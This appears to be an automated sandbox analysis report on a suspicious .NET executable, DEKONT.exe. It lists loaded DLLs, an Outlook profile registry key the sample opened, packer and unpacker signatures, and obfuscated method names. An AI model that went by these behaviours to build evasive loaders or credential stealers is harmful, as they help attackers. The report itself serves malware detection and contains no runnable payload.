Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\DEKONT.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\DEKONT.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\DEKONT.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: DEKONT.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: DEKONT.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: DEKONT.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: YaaO.pdbSHA256 source: DEKONT.exe
Source:	Binary string: YaaO.pdb source: DEKONT.exe

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.DEKONT.exe.4409970.10.raw.unpack, V4uC3Iifq56IKQcfry.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.DEKONT.exe.5b20000.11.raw.unpack, V4uC3Iifq56IKQcfry.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: DEKONT.exe, frm_Graph_Drawer.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, am6RHBVRAjP4cOtlwi.cs	.Net Code: V0iuXfAkuX System.Reflection.Assembly.Load(byte[])
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, am6RHBVRAjP4cOtlwi.cs	.Net Code: V0iuXfAkuX System.Reflection.Assembly.Load(byte[])

Source: DEKONT.exe

Static PE information: 0x8DFED4A7 [Wed Jun 28 18:40:39 2045 UTC]

Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_017FDD18 push eax; iretd	0_2_017FF3A9
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_017FF3F0 pushfd ; iretd	0_2_017FF3F1
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_059A37D0 push eax; iretd	0_2_059A37D1
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_059ACF50 push eax; mov dword ptr [esp], edx	0_2_059ACF64
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_059A3932 pushfd ; iretd	0_2_059A3939
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_059A38B2 pushad ; iretd	0_2_059A38B9
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_07ABF6DE pushfd ; iretd	0_2_07ABF6DF
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_07ABF5EE pushfd ; iretd	0_2_07ABF5EF
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_07ABF4C7 pushfd ; iretd	0_2_07ABF4C8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_07ABF1AA pushfd ; iretd	0_2_07ABF1AB
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_07ABF132 pushfd ; iretd	0_2_07ABF133
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_07ABF8F7 pushfd ; iretd	0_2_07ABF8F8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_02DC9770 push esp; ret	3_2_02DC9771
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE3671 push es; iretd	3_2_06CE367C
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CEF75D push es; ret	3_2_06CEF888
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CEF889 push es; ret	3_2_06CEF888
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_06CE9045 push es; ret	3_2_06CE904C

Source: DEKONT.exe

Static PE information: section name: .text entropy: 7.894619562911896

Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, j7d5IZaVDa8eflLKhe.cs	High entropy of concatenated method names: 'Dispose', 'YQbSRd8CIr', 'NBkGmQUEBF', 'l2btt69X0M', 'lpGSjvFYN1', 'T41SzQibdE', 'ProcessDialogKey', 'DHAGT9kF5E', 'xMoGSWPl4N', 'J5RGG0yyrD'
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, NrVOQ4zeWdeVemv54c.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sqEy06EkHZ', 'i64yhNOq3b', 'CqJyZL140A', 'Ykuy83HTux', 'NF2y6ok59K', 'tv6yyGLf15', 'H9gyKWXGYY'
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, muuaUoYiGSoCDdtP5k.cs	High entropy of concatenated method names: 'WiEySSoxDY', 'r3HybsKy6r', 'KMByuWM7mR', 'daQyYEVdcn', 'NPZyVdwErR', 'sikyas3i1e', 'AtUy3Dl89Q', 'xlU6J8bIC6', 'Jga6QmZZ6c', 'Vrq6RCXOQ4'
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, yF000nJfGcUm3eXcd6.cs	High entropy of concatenated method names: 'LsTSg9qWCk', 'xvKSFUP70r', 'vXJSUjRcoZ', 'uEtS9TwUOF', 'gkqShoV01o', 'yiNSZ0Mj9A', 'gkEcbl9QpfuwCiLQcE', 'JCAj49fxwY6ICSYfRW', 'RYXSSaPVrK', 'NsUSbbFICD'
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, YmAf6MkD2jSb9njWmK.cs	High entropy of concatenated method names: 'Esd3dvXPia', 'l8j3LRaKLp', 'Wno3XihAPf', 'Pfk3fKsF7l', 'F6u3OADrMx', 'kW23e9nTgp', 'Qqe3Mj18Q6', 'IkJ3oWxDRL', 'rDxX9h4BY6BCoD2uUom', 'NVmtcI4jAGOGIfDqbJA'
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, f5NFKofKgfJb7mVTpo.cs	High entropy of concatenated method names: 'QB4hAtCDIS', 'TBUhkOP5su', 'i6WhcPjsUr', 'Tg2hnEwqNI', 'vUChmEU4y1', 'OpqhD6IYBw', 'LG7hr5EW6A', 'WFAhi6Is42', 'xd1h5NmDN6', 'c6VhNCRtrY'
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, T2wON1nl2AHSS7i3Cd.cs	High entropy of concatenated method names: 'vs6aqYDlJe', 'vIEae1JnTG', 'LL2CDM179A', 'PSiCrsb9I1', 'S9jCi1Y0VS', 'QvSC5XKyyU', 'RkmCNB2iQs', 'UGjCxsH1w9', 'cLwCvmB9p1', 'CORCAJRthF'
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, e2x0LcsrhHTSFP8f88.cs	High entropy of concatenated method names: 'qqu8QNTANw', 'tjS8jDCbGN', 'HLR6TNmS3T', 'PR06S39DBg', 'FhF823uPbT', 'qBE8khOYIe', 'cha8sH9DN2', 'WJq8cLXvwq', 'wsI8nI3iHl', 'SFX845yDgj'
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, A0ifTxEhkahsKJcug7.cs	High entropy of concatenated method names: 'qov0ILdnPw', 'Eqd0MX1MS3', 'yLc0HR4vPr', 'B9K0mQaHsB', 'uXY0rNBQKy', 'Sw00i1gugn', 'n7t0NoQMtU', 'TDf0xJfVEt', 'TJx0A82xCL', 'tX402bl8NB'
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, hgicsSiWJil1ySVfNkc.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CGJKcCiosc', 'BxcKnge9VJ', 'rgjK4IDRDk', 'tH3Kp6QFnC', 'GycKWTFqhk', 'FE0KP6U07J', 'moiKJ3XABH'
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, gBrw0gPbXtcXH18PyW.cs	High entropy of concatenated method names: 'PWHVcgh4Zo', 'rimVnfljhR', 'xNOV4ga8Wx', 'vv6VpOndoN', 'qqAVWKBehY', 'wE9VPhSDcJ', 'rMaVJaJb58', 'qNGVQPJT1b', 'KyBVRqIL8x', 'YZqVjrhrtb'
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, Vu7uKBGDy1SRZu1Rwk.cs	High entropy of concatenated method names: 'KJS3wNu6nd', 'vHZ3V0if6Y', 'DGP3aovHcZ', 'EAC3gmZJU5', 'R6p3FIvIBa', 'w2HaW6O5LH', 'NXPaPqDd8s', 'L6EaJAIPF4', 'WJdaQBrDvJ', 'XEZaRU4F80'
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, dZi2dj2hRfNN8h8ksu.cs	High entropy of concatenated method names: 'ToString', 'rDLZ2npVs2', 'fuNZmmn1P9', 'DOQZDAglPg', 'wqpZrqQ7wH', 'mhvZiaEdXb', 'HlxZ5bTTva', 'MDuZNy0fHq', 'jovZxqtMGH', 'iZ4ZvWVp7j'
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, KXbphEuMQhqJVEQoHN.cs	High entropy of concatenated method names: 'fTCXV8POU', 'YOsf4DMSK', 'zKPOQTjUT', 'vUGe7Yu1f', 's8SMVdvbn', 'ECPoxvOp1', 'wJ0l7PP7mgVKm7pksU', 'LONHPEUi8265Ew4qbO', 'aSx6QGAIn', 'M9xKlMe4m'
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, lGaBmFeZoKPSkJP2Yp.cs	High entropy of concatenated method names: 'vc5CfD3IXy', 'ASLCOnWPQI', 'L2yCIvLsAb', 'To3CMUXlDp', 'BLMChjwWcj', 'JVxCZHJC3O', 'ut0C81SnUE', 'x28C69df3j', 'UdyCyyAOmi', 'S4dCKHEocf'
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, Ywj4IaidrNmP8uv9vDJ.cs	High entropy of concatenated method names: 'Id5yLlpHWO', 'gy4yB3XQ69', 'FSwyX5YUs8', 'FL8yfTf6iA', 'SIxyqarAE2', 'rlZyOpucCs', 'xtFyeCEA0d', 'WoQyIEeMQj', 'BoOyMx7XYH', 'j92yo63jMS'
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, B4811WBL5mqt3ICmNd.cs	High entropy of concatenated method names: 'Be6gYa1Mry', 'RNhgCCPmnl', 'MT3g3r93XP', 'DFi3jou71e', 'mIk3z8TjwO', 'ujdgTSmMtM', 'KYhgSq3AZk', 'XNQgGWHuTJ', 'HS8gbK7J3w', 'G0mguGLxOI'
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, rLmnNArP7PMRCd7lnZ.cs	High entropy of concatenated method names: 'Evl6Y0Whxr', 'qgR6VsEdAm', 're76CWwgB0', 'bZC6aM43Io', 'TSg63UMjKx', 'Ivm6gFNOlM', 'byg6FFB0R0', 'UcN6EaaGCV', 'V4w6UCt7Lk', 'jX169cVtTZ'
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, am6RHBVRAjP4cOtlwi.cs	High entropy of concatenated method names: 'PxCbwXdJr5', 'D9IbYynKIL', 'l9GbVZSH7o', 'eCLbCFOomy', 'asDbaHLltO', 'GVQb33uaOD', 'HLlbgrTb6P', 'jK2bFQIlLq', 'kCHbEtCv2i', 'YhVbUAoxDl'
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, FBG5j0iuYmUu2hs3rvO.cs	High entropy of concatenated method names: 'BVSKL8JT5Y', 'VgxKB6mUN7', 'E12KXgaD9m', 'NWbo4MZp6D7eQuKkqtp', 'u4O1ncZ40P2AaXDrFJl', 'rNIAsvZDs2OwHN49hTb', 'kYjD05ZAi6Jpt0QPqwG'
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, BFLjVfUFsTVdK6vfYh.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'UBPGRQcean', 'Gh7Gj844bg', 'OZ3GzDf4N5', 'ENBbTqRG9y', 'EvRbSr2yTm', 'tq1bGYGv8l', 'T5ybb6hZCk', 'wmqQ5DplEUp2txgLK2P'
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, F210rv93PN13RwKJgt.cs	High entropy of concatenated method names: 'V51345goeB', 'zfv3pHKBAx', 'jlj3WjfsrN', 'ToString', 'jVt3PTFlX2', 'shK3Jh18kc', 'EBgIAr4FQW6NbudKLPc', 'WknDC34Eysm7R6M5wJZ'
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, Lx9sgrycVNWcPtH7Mh.cs	High entropy of concatenated method names: 'FZQgL2dWTg', 'OZdgBlfbmG', 'iGlgXJAjYy', 'bWhgfsRR8y', 'ey2gqCsvj9', 'wfigO0Ts0Q', 'm0ogeuk6h3', 'BbTgIYsToM', 'yENgMOilNQ', 'xKagoHKFjt'
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, AdfsfmCabcv5q7JqiV.cs	High entropy of concatenated method names: 'o2H8UTwoUn', 'jtJ89ykxL2', 'ToString', 'b9K8YeR9y5', 'bPX8VfyOgm', 'f228CuIvTQ', 'U3F8aQkjAE', 'A9s83iQBbF', 'MHA8gKCxxM', 'By88FKKrHU'
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, tlZ78fq5Zw1LILhJLc.cs	High entropy of concatenated method names: 'AAn6HO6HkR', 'Gjt6mhAy5U', 'qOx6DlTZMU', 'eHy6rtgrOM', 'Pba6cWLU3G', 'OJD6i0hRbv', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, j7d5IZaVDa8eflLKhe.cs	High entropy of concatenated method names: 'Dispose', 'YQbSRd8CIr', 'NBkGmQUEBF', 'l2btt69X0M', 'lpGSjvFYN1', 'T41SzQibdE', 'ProcessDialogKey', 'DHAGT9kF5E', 'xMoGSWPl4N', 'J5RGG0yyrD'
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, NrVOQ4zeWdeVemv54c.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sqEy06EkHZ', 'i64yhNOq3b', 'CqJyZL140A', 'Ykuy83HTux', 'NF2y6ok59K', 'tv6yyGLf15', 'H9gyKWXGYY'
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, muuaUoYiGSoCDdtP5k.cs	High entropy of concatenated method names: 'WiEySSoxDY', 'r3HybsKy6r', 'KMByuWM7mR', 'daQyYEVdcn', 'NPZyVdwErR', 'sikyas3i1e', 'AtUy3Dl89Q', 'xlU6J8bIC6', 'Jga6QmZZ6c', 'Vrq6RCXOQ4'
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, yF000nJfGcUm3eXcd6.cs	High entropy of concatenated method names: 'LsTSg9qWCk', 'xvKSFUP70r', 'vXJSUjRcoZ', 'uEtS9TwUOF', 'gkqShoV01o', 'yiNSZ0Mj9A', 'gkEcbl9QpfuwCiLQcE', 'JCAj49fxwY6ICSYfRW', 'RYXSSaPVrK', 'NsUSbbFICD'
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, YmAf6MkD2jSb9njWmK.cs	High entropy of concatenated method names: 'Esd3dvXPia', 'l8j3LRaKLp', 'Wno3XihAPf', 'Pfk3fKsF7l', 'F6u3OADrMx', 'kW23e9nTgp', 'Qqe3Mj18Q6', 'IkJ3oWxDRL', 'rDxX9h4BY6BCoD2uUom', 'NVmtcI4jAGOGIfDqbJA'
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, f5NFKofKgfJb7mVTpo.cs	High entropy of concatenated method names: 'QB4hAtCDIS', 'TBUhkOP5su', 'i6WhcPjsUr', 'Tg2hnEwqNI', 'vUChmEU4y1', 'OpqhD6IYBw', 'LG7hr5EW6A', 'WFAhi6Is42', 'xd1h5NmDN6', 'c6VhNCRtrY'
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, T2wON1nl2AHSS7i3Cd.cs	High entropy of concatenated method names: 'vs6aqYDlJe', 'vIEae1JnTG', 'LL2CDM179A', 'PSiCrsb9I1', 'S9jCi1Y0VS', 'QvSC5XKyyU', 'RkmCNB2iQs', 'UGjCxsH1w9', 'cLwCvmB9p1', 'CORCAJRthF'
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, e2x0LcsrhHTSFP8f88.cs	High entropy of concatenated method names: 'qqu8QNTANw', 'tjS8jDCbGN', 'HLR6TNmS3T', 'PR06S39DBg', 'FhF823uPbT', 'qBE8khOYIe', 'cha8sH9DN2', 'WJq8cLXvwq', 'wsI8nI3iHl', 'SFX845yDgj'
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, A0ifTxEhkahsKJcug7.cs	High entropy of concatenated method names: 'qov0ILdnPw', 'Eqd0MX1MS3', 'yLc0HR4vPr', 'B9K0mQaHsB', 'uXY0rNBQKy', 'Sw00i1gugn', 'n7t0NoQMtU', 'TDf0xJfVEt', 'TJx0A82xCL', 'tX402bl8NB'
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, hgicsSiWJil1ySVfNkc.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CGJKcCiosc', 'BxcKnge9VJ', 'rgjK4IDRDk', 'tH3Kp6QFnC', 'GycKWTFqhk', 'FE0KP6U07J', 'moiKJ3XABH'
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, gBrw0gPbXtcXH18PyW.cs	High entropy of concatenated method names: 'PWHVcgh4Zo', 'rimVnfljhR', 'xNOV4ga8Wx', 'vv6VpOndoN', 'qqAVWKBehY', 'wE9VPhSDcJ', 'rMaVJaJb58', 'qNGVQPJT1b', 'KyBVRqIL8x', 'YZqVjrhrtb'
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, Vu7uKBGDy1SRZu1Rwk.cs	High entropy of concatenated method names: 'KJS3wNu6nd', 'vHZ3V0if6Y', 'DGP3aovHcZ', 'EAC3gmZJU5', 'R6p3FIvIBa', 'w2HaW6O5LH', 'NXPaPqDd8s', 'L6EaJAIPF4', 'WJdaQBrDvJ', 'XEZaRU4F80'
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, dZi2dj2hRfNN8h8ksu.cs	High entropy of concatenated method names: 'ToString', 'rDLZ2npVs2', 'fuNZmmn1P9', 'DOQZDAglPg', 'wqpZrqQ7wH', 'mhvZiaEdXb', 'HlxZ5bTTva', 'MDuZNy0fHq', 'jovZxqtMGH', 'iZ4ZvWVp7j'
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, KXbphEuMQhqJVEQoHN.cs	High entropy of concatenated method names: 'fTCXV8POU', 'YOsf4DMSK', 'zKPOQTjUT', 'vUGe7Yu1f', 's8SMVdvbn', 'ECPoxvOp1', 'wJ0l7PP7mgVKm7pksU', 'LONHPEUi8265Ew4qbO', 'aSx6QGAIn', 'M9xKlMe4m'
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, lGaBmFeZoKPSkJP2Yp.cs	High entropy of concatenated method names: 'vc5CfD3IXy', 'ASLCOnWPQI', 'L2yCIvLsAb', 'To3CMUXlDp', 'BLMChjwWcj', 'JVxCZHJC3O', 'ut0C81SnUE', 'x28C69df3j', 'UdyCyyAOmi', 'S4dCKHEocf'
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, Ywj4IaidrNmP8uv9vDJ.cs	High entropy of concatenated method names: 'Id5yLlpHWO', 'gy4yB3XQ69', 'FSwyX5YUs8', 'FL8yfTf6iA', 'SIxyqarAE2', 'rlZyOpucCs', 'xtFyeCEA0d', 'WoQyIEeMQj', 'BoOyMx7XYH', 'j92yo63jMS'
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, B4811WBL5mqt3ICmNd.cs	High entropy of concatenated method names: 'Be6gYa1Mry', 'RNhgCCPmnl', 'MT3g3r93XP', 'DFi3jou71e', 'mIk3z8TjwO', 'ujdgTSmMtM', 'KYhgSq3AZk', 'XNQgGWHuTJ', 'HS8gbK7J3w', 'G0mguGLxOI'
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, rLmnNArP7PMRCd7lnZ.cs	High entropy of concatenated method names: 'Evl6Y0Whxr', 'qgR6VsEdAm', 're76CWwgB0', 'bZC6aM43Io', 'TSg63UMjKx', 'Ivm6gFNOlM', 'byg6FFB0R0', 'UcN6EaaGCV', 'V4w6UCt7Lk', 'jX169cVtTZ'
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, am6RHBVRAjP4cOtlwi.cs	High entropy of concatenated method names: 'PxCbwXdJr5', 'D9IbYynKIL', 'l9GbVZSH7o', 'eCLbCFOomy', 'asDbaHLltO', 'GVQb33uaOD', 'HLlbgrTb6P', 'jK2bFQIlLq', 'kCHbEtCv2i', 'YhVbUAoxDl'
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, FBG5j0iuYmUu2hs3rvO.cs	High entropy of concatenated method names: 'BVSKL8JT5Y', 'VgxKB6mUN7', 'E12KXgaD9m', 'NWbo4MZp6D7eQuKkqtp', 'u4O1ncZ40P2AaXDrFJl', 'rNIAsvZDs2OwHN49hTb', 'kYjD05ZAi6Jpt0QPqwG'
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, BFLjVfUFsTVdK6vfYh.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'UBPGRQcean', 'Gh7Gj844bg', 'OZ3GzDf4N5', 'ENBbTqRG9y', 'EvRbSr2yTm', 'tq1bGYGv8l', 'T5ybb6hZCk', 'wmqQ5DplEUp2txgLK2P'
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, F210rv93PN13RwKJgt.cs	High entropy of concatenated method names: 'V51345goeB', 'zfv3pHKBAx', 'jlj3WjfsrN', 'ToString', 'jVt3PTFlX2', 'shK3Jh18kc', 'EBgIAr4FQW6NbudKLPc', 'WknDC34Eysm7R6M5wJZ'
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, Lx9sgrycVNWcPtH7Mh.cs	High entropy of concatenated method names: 'FZQgL2dWTg', 'OZdgBlfbmG', 'iGlgXJAjYy', 'bWhgfsRR8y', 'ey2gqCsvj9', 'wfigO0Ts0Q', 'm0ogeuk6h3', 'BbTgIYsToM', 'yENgMOilNQ', 'xKagoHKFjt'
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, AdfsfmCabcv5q7JqiV.cs	High entropy of concatenated method names: 'o2H8UTwoUn', 'jtJ89ykxL2', 'ToString', 'b9K8YeR9y5', 'bPX8VfyOgm', 'f228CuIvTQ', 'U3F8aQkjAE', 'A9s83iQBbF', 'MHA8gKCxxM', 'By88FKKrHU'
Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, tlZ78fq5Zw1LILhJLc.cs	High entropy of concatenated method names: 'AAn6HO6HkR', 'Gjt6mhAy5U', 'qOx6DlTZMU', 'eHy6rtgrOM', 'Pba6cWLU3G', 'OJD6i0hRbv', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.DEKONT.exe.4409970.10.raw.unpack, V4uC3Iifq56IKQcfry.cs	High entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
Source: 0.2.DEKONT.exe.4409970.10.raw.unpack, vpednoN8EZgsJ4TDwx.cs	High entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
Source: 0.2.DEKONT.exe.5b20000.11.raw.unpack, V4uC3Iifq56IKQcfry.cs	High entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
Source: 0.2.DEKONT.exe.5b20000.11.raw.unpack, vpednoN8EZgsJ4TDwx.cs	High entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'

Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
